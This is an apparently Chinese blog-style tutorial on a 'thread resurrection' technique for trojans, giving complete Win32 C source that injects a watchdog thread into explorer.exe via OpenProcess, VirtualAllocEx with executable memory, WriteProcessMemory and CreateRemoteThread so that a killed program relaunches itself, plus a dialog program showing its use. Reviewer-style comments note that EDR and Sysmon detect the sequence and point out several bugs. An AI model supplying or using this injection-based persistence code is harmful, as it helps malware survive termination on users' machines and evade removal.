木马的线程复活技术
远程线程插入技术,挺常见而实用的东西。
只是 CreateRemoteThread 这类远程线程插入调用早已是杀软/EDR 的重点监视对象:对 explorer.exe 先 OpenProcess(PROCESS_ALL_ACCESS),再 VirtualAllocEx 申请可执行可写内存、WriteProcessMemory 写入代码、最后 CreateRemoteThread,这一整套序列本身就是典型的注入特征(Sysmon 的 ProcessAccess / CreateRemoteThread 事件和各家 EDR 都会记录并告警),所以这东西以后还能用多久很难说。
///////////////////////
//NotDead.h
//////////////////////
//
// NotDead.h -- "thread resurrection" watchdog used by trojans for self-protection.
//
// NotDead() copies the function remote() and a REMOTEPARA block into
// explorer.exe and starts remote() there as a new thread. That thread waits
// for the calling process to exit and then relaunches it with WinExec().
// Everything below is 32-bit, ANSI Win32 code: function addresses travel in
// DWORD fields and raw code bytes are copied between processes.
//
// NOTE(review): the OpenProcess(PROCESS_ALL_ACCESS) -> VirtualAllocEx(RWX) ->
// WriteProcessMemory -> CreateRemoteThread sequence against explorer.exe is
// the textbook injection signature that AV/EDR products and Sysmon (process
// access / remote thread events) record and alert on.
//
#include <windows.h>
#include <TLHELP32.H>

// Unused in this file: nothing below reads or writes exepath.
TCHAR exepath[MAX_PATH]={0x00};

// Parameter block written into the target process and handed to remote().
// remote() must not reference anything outside this struct (no globals, no
// import thunks), so every API it needs is passed in as a raw address.
typedef struct _remotepara
{
    DWORD pWaitForSingleObject;   // address of kernel32!WaitForSingleObject
    DWORD pOpenProcess;           // address of kernel32!OpenProcess
    DWORD pWinExec;               // address of kernel32!WinExec
    DWORD PID;                    // PID of the process to watch (the caller of NotDead)
    HANDLE hProcess;              // filled in by remote(); never closed
    char path[MAX_PATH];          // command line passed to WinExec once PID has exited
    // NOTE(review): a DWORD cannot hold a 64-bit pointer, so this layout is
    // only meaningful in a 32-bit build.
}REMOTEPARA,*pREMOTEPARA;

// Enables the privilege `name` (the caller passes SE_DEBUG_NAME) on the
// current *process* token -- despite the original comment this is not
// per-thread.
//
// Returns false only if the token cannot be opened, the privilege name is
// unknown, or AdjustTokenPrivileges itself fails.
// NOTE(review): AdjustTokenPrivileges returns TRUE even when the token does
// not hold the privilege (GetLastError() == ERROR_NOT_ALL_ASSIGNED is never
// checked), so a non-admin caller still gets `true` without SeDebugPrivilege.
// NOTE(review): hToken is never closed on any path.
bool EnableDebugPrivilege(const char *name)
{
    HANDLE hToken;
    TOKEN_PRIVILEGES tp;
    if (!OpenProcessToken(GetCurrentProcess(),TOKEN_ADJUST_PRIVILEGES|TOKEN_QUERY,&hToken))
        return false;
    if (!LookupPrivilegeValue(NULL,name,&tp.Privileges[0].Luid))
        return false;
    tp.PrivilegeCount=1;
    tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
    if (!AdjustTokenPrivileges(hToken,FALSE,&tp,sizeof(TOKEN_PRIVILEGES),NULL,NULL))
        return false;
    return true;
}

// Returns the PID of the first running process whose image name equals
// ProcessName (case-insensitive, via strlwr on both sides), or 0 when there
// is no match or the Toolhelp snapshot cannot be taken.
//
// NOTE(review): strlwr() lowercases *in place*, so ProcessName is written to.
// NotDead() passes the string literal "explorer.exe"; modifying a string
// literal is undefined behaviour (and a crash when the literal is mapped
// read-only).
// NOTE(review): on a match the function returns from inside the loop and
// hProcessSnap is leaked; CloseHandle() is only reached when nothing matches.
// NOTE(review): the name collides with the Win32 API GetProcessId(HANDLE) in
// newer SDKs; C++ accepts it as an overload, C would reject the redeclaration.
DWORD GetProcessId(char *ProcessName)
{
    PROCESSENTRY32 pe32;
    pe32.dwSize = sizeof(pe32);
    HANDLE hProcessSnap=CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);
    if (hProcessSnap==INVALID_HANDLE_VALUE)
        return 0;
    BOOL bProcess=Process32First(hProcessSnap,&pe32);
    while(bProcess)
    {
        if (strcmp(strlwr(pe32.szExeFile),strlwr(ProcessName))==0)
            return pe32.th32ProcessID;
        bProcess=Process32Next(hProcessSnap,&pe32);
    }
    CloseHandle(hProcessSnap);
    return 0;
}

// Thread body that executes inside the target process (explorer.exe).
//
// NotDead() copies it there byte-for-byte, so it has to be
// position-independent: it only uses the addresses carried in *rp and
// compile-time constants -- no direct API calls, globals or string literals.
//
// Behaviour: open the watched process, block until it terminates, then start
// it again with WinExec(rp->path, SW_SHOW) and exit.
// NOTE(review): if OpenProcess fails, hProcess is NULL, WaitForSingleObject
// fails immediately and WinExec runs at once -- a second copy of the watched
// process is started while the first one is still alive.
// NOTE(review): rp->hProcess is never closed.
DWORD WINAPI remote(LPVOID _rp)
{
    REMOTEPARA *rp = (REMOTEPARA*)_rp;
    typedef UINT (WINAPI *XWinExec)(LPSTR,UINT);
    typedef HANDLE (WINAPI *XOpenProcess)(DWORD,BOOL,DWORD);
    typedef DWORD (WINAPI *XWaitForSingleObject)(HANDLE,DWORD);
    // Rebuild callable function pointers from the raw addresses in *rp.
    XWaitForSingleObject MyWaitForSingleObject = (XWaitForSingleObject)rp->pWaitForSingleObject;
    XOpenProcess MyOpenProcess = (XOpenProcess)rp->pOpenProcess;
    XWinExec MyWinExec = (XWinExec)rp->pWinExec;
    // Wait for the watched process to terminate, then relaunch it.
    rp->hProcess = MyOpenProcess(PROCESS_ALL_ACCESS,FALSE,rp->PID);
    MyWaitForSingleObject(rp->hProcess,INFINITE);
    MyWinExec(rp->path,SW_SHOW);
    return 0;
}

// Installs the watchdog: writes remote() and a REMOTEPARA describing the
// current process into explorer.exe and starts remote() there as a thread.
//
// Returns 1 when the remote thread was created, 0 on any failure.
//
// NOTE(review): the 1024*4 bytes written are simply whatever follows `remote`
// in this image, not the function's real size. The copy only works if the
// compiler emits remote() as one contiguous, self-contained chunk of code,
// which nothing guarantees (with incremental linking `remote` may be just a
// jump thunk, and the injected thread then executes garbage in explorer.exe).
// NOTE(review): resource handling -- hProtecte leaks on every early return
// after OpenProcess, hRemoteThread is never closed, and neither remote
// allocation is freed (the injected thread needs them for its whole life).
// NOTE(review): hkernel is not checked; if GetModuleHandle fails, three NULL
// function pointers are shipped to explorer.exe and the injected thread
// crashes it. The code also relies on kernel32.dll being mapped at the same
// base in both processes (expected for system DLLs within one boot session
// on Windows -- confirm for the target OS version).
int NotDead()
{
    // Try to enable SeDebugPrivilege. Only a failure to open/adjust the token
    // aborts here; an unassigned privilege does not (see EnableDebugPrivilege).
    if(!EnableDebugPrivilege(SE_DEBUG_NAME))
        return 0;
    // ProctectPID: the injection target (explorer.exe).
    // ProctectedPID: this process, the one to be resurrected.
    DWORD ProctectPID,ProctectedPID;
    ProctectedPID=GetCurrentProcessId();
    if ((ProctectPID=GetProcessId("explorer.exe")) == 0)
        return 0;
    // Full access to the target is needed for the alloc/write/thread calls below.
    HANDLE hProtecte = OpenProcess(PROCESS_ALL_ACCESS,FALSE,ProctectPID);
    if (hProtecte==NULL)
        return 0;
    // Commit 4 KB of read-write-execute memory in the target for remote()'s code.
    // (RemoteAddrFun is a remote address, not a handle, despite its type.)
    HANDLE RemoteAddrFun;
    RemoteAddrFun = (PTSTR)VirtualAllocEx(hProtecte,NULL,1024*4,MEM_COMMIT|MEM_RESERVE,PAGE_EXECUTE_READWRITE);
    if (RemoteAddrFun==NULL)
        return 0;
    // Copy the raw bytes starting at remote() into the target.
    if (WriteProcessMemory(hProtecte,RemoteAddrFun,(LPVOID)remote,1024*4,NULL)==FALSE)
        return 0;
    // Build the parameter block: our own image path, our PID, and the
    // kernel32 entry points remote() will call.
    REMOTEPARA rp;
    memset((char *)&rp,0x00,sizeof(rp));
    // NOTE(review): path is char[] while GetModuleFileName takes a TCHAR
    // buffer; this only compiles in an ANSI (non-UNICODE) build. 260 == MAX_PATH.
    GetModuleFileName(NULL,rp.path,260);
    rp.PID = ProctectedPID;
    HMODULE hkernel = GetModuleHandle("kernel32.dll");
    rp.pOpenProcess = (DWORD)GetProcAddress(hkernel,"OpenProcess");
    rp.pWinExec = (DWORD)GetProcAddress(hkernel,"WinExec");
    rp.pWaitForSingleObject = (DWORD)GetProcAddress(hkernel,"WaitForSingleObject");
    // Allocate space for the parameter block in the target and write it there.
    HANDLE RemoteAddrPara;
    RemoteAddrPara = (PTSTR)VirtualAllocEx(hProtecte,NULL,sizeof(rp),MEM_COMMIT,PAGE_READWRITE);
    if (RemoteAddrPara==NULL)
        return 0;
    if (WriteProcessMemory(hProtecte,RemoteAddrPara,(LPVOID)&rp,sizeof(rp),NULL)==FALSE)
        return 0;
    //===================================
    // Start remote() in the target with the parameter block as its argument.
    //===================================
    HANDLE hRemoteThread = CreateRemoteThread(hProtecte,NULL,0,(LPTHREAD_START_ROUTINE)RemoteAddrFun,(LPVOID)RemoteAddrPara,0,NULL);
    if (hRemoteThread==NULL)
        return 0;
    CloseHandle(hProtecte);
    return 1;
}
使用方法:只需要在程序中调用NotDead()即可。
示例:
// X.cpp : Defines the entry point for the application.
//
// Minimal host for NotDead.h: a dialog whose WM_INITDIALOG handler installs
// the explorer.exe watchdog, so killing this program makes the injected
// thread relaunch it.
#include "stdafx.h"
#include "resource.h"
#include "NotDead.h"

// Dialog procedure for IDD_DIALOG1.
//   WM_INITDIALOG -> call NotDead() once; its 0/1 result is ignored.
//   WM_CLOSE      -> EndDialog(hwndDlg, 0).
// Every message returns 0 (FALSE), i.e. "not handled"; for WM_INITDIALOG
// that also tells the dialog manager not to set the default keyboard focus.
// NOTE(review): the SDK declares a DLGPROC as returning INT_PTR; INT matches
// on 32-bit only.
INT CALLBACK DlgProc(
    HWND hwndDlg,   // handle to dialog box
    UINT uMsg,      // message
    WPARAM wParam,  // first message parameter (unused)
    LPARAM lParam   // second message parameter (unused)
)
{
    switch(uMsg)
    {
    case WM_INITDIALOG:
        NotDead();   // return value not checked
        break;
    case WM_CLOSE:
        EndDialog(hwndDlg,0);
        break;
    }
    return 0;
}

// Program entry: shows IDD_DIALOG1 modally and exits when it is dismissed.
// hPrevInstance, lpCmdLine and nCmdShow are unused.
int APIENTRY WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow)
{
    DialogBox(hInstance,MAKEINTRESOURCE(IDD_DIALOG1),NULL,DlgProc);
    return 0;
}